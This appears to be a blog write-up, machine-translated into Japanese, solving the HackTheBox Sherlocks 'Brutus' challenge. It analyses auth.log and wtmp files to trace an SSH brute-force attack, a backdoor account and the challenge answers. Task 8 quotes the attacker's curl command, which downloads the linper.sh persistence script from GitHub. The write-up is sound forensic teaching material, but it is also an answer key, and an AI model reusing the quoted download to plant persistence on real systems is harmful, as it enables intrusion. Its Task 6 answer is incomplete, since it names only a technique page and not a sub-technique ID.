banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。
ホームアーカイブ图文

hackthebox SherlocksのBrutusターゲットの記録

#htb#sherlocks152
AI 翻訳
この記事はAIを通じて中国語から日本語に翻訳されました。原文を表示
AI が生成した要約
类别:linux取证、DFIR 这个靶场提供了两个文件:auth.log,wtmp,主要考点是关于linux下auth.log、wtmp文件的知识点,可以增加对auth.log文件的认识,也是在取证中比较常看的日志文件。 auth.log文件记录了Linux系统中与身份验证相关的事件,包括成功和失败的登录尝试、用户切换、sudo命令使用、SSH连接等。wtmp文件可以使用utmpdump工具查看,记录了用户登录或注销、系统启动或关机事件等信息。

image

カテゴリ:Linux フォレンジック、DFIR

このシナリオでは、auth.log と wtmp の 2 つのファイルが提供されます。

このシナリオの焦点は、Linux の auth.log と wtmp ファイルに関する知識であり、auth.log ファイルの理解を深めることができます。これは、フォレンジックでよく見られるログファイルです。

auth.log ファイルは、Linux システムで認証に関連するイベントを記録するためのファイルであり、特に Debian ベースのディストリビューションで使用されます。主にシステムの認証イベントを記録し、成功したログイン試行、ユーザーの切り替え、sudo コマンドの使用、SSH 接続などが含まれます。

auth.log の各フィールドの説明:

  • タイムスタンプ:ログが生成された日付と時刻
  • ホスト名:Linux マシンの名前
  • プロセス名:プロセスの名前
  • プロセス ID:プロセス ID 識別子
  • ユーザー:認証プロセスに関与するユーザー名
  • 認証ステータス:認証試行が成功したか失敗したかを詳細に説明します
  • IP アドレス:リモート接続の試行元 IP アドレス
  • メッセージの内容:
Aug  8 12:34:56 hostname sshd[12345]: Failed password for root from 192.168.1.100 port 54321 ssh2

WTMP ファイル

wtmp ファイルは、Mac ではutmpdumpツールを使用して表示できます。Linux サーバーでは、lastコマンドを使用して wtmp ログを表示できます。

image

utmpdumpの出力には、wtmpファイルのバイナリ形式からデコードされた複数のフィールドが含まれています。以下に各フィールドの説明を示します:

  • タイプ:レコードのタイプを示します。ユーザーログインまたはログアウト、システムの起動またはシャットダウンイベントなどがあります。
  • プロセス ID:イベントに関連するプロセス識別子
  • ライン:ユーザーがログインした端末ライン(tty または pts)
  • 識別子:ラインフィールドに関連する短い識別子
  • ユーザー:イベントに関連するユーザー名
  • ホスト:該当する場合、システムへのユーザーアクセスのホスト名または IP アドレス
  • 終了:セッションまたはプロセスの終了ステータス
  • セッション:セッション ID
  • 時間:イベントのタイムスタンプ
  • アドレス:追加のアドレス情報。リモートログインの場合、IP アドレスかもしれません

Task1 auth.log ログを確認すると、攻撃者がブルートフォース攻撃に使用した IP アドレスを特定できますか?

cat auth.log | grep -E "([0-9]{1,3}[\.]){3}[0-9]{1,3}" -r xxx --color=auto | grep "Invalid user"

65.2.161.68

Task2 ブルートフォース攻撃により、攻撃者はサーバー上のアカウントに侵入しました。では、このアカウントのユーザー名は何ですか?

root

Task3 攻撃者がサーバーにログインして計画を実行した具体的な時刻を特定できますか?

image

タイムゾーンの差がありますので、8 を引きます。14:32:45 - 8:00:00 = 06:32:45

2024-03-06 06:32:45

Task4 SSH セッションはユーザーログイン時にトラッキングされ、各セッションには番号が割り当てられます。問題 2 で説明されているシナリオでは、攻撃者が使用したアカウントでログインした後、セッションにはどの番号が割り当てられましたか?

cat auth.log | grep "root"

37

image

Task5 攻撃者はサーバー上にバックドアアカウントを作成し、このアカウントにより高い権限レベルを設定しました。では、このアカウントの名前は何ですか?

cat auth.log | grep "Accept"

cyberjunkie

image

Task6 MITRE ATT&CK の持続化に使用されるサブテクニック ID は何ですか?

https://attack.mitre.org/techniques/T1136

image

Task7 前に確認したログイン時間と認証ログファイルに記録されたセッション終了時間に基づいて、攻撃者が最初に SSH 接続を確立してからの持続時間は何秒ですか?

32.45 から 37:24 まで

240+39

Mar  6 06:32:44 ip-172-31-35-28 systemd-logind[411]: New session 37 of user root.

Mar  6 06:37:24 ip-172-31-35-28 systemd-logind[411]: Session 37 logged out. Waiting for processes to exit.

Task8 攻撃者はバックドアアカウントにログインし、より高い権限でスクリプトをダウンロードしました。sudo を使用して実行された完全なコマンドは何ですか?

/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh

image

読み込み中...
文章は、創作者によって署名され、ブロックチェーンに安全に保存されています。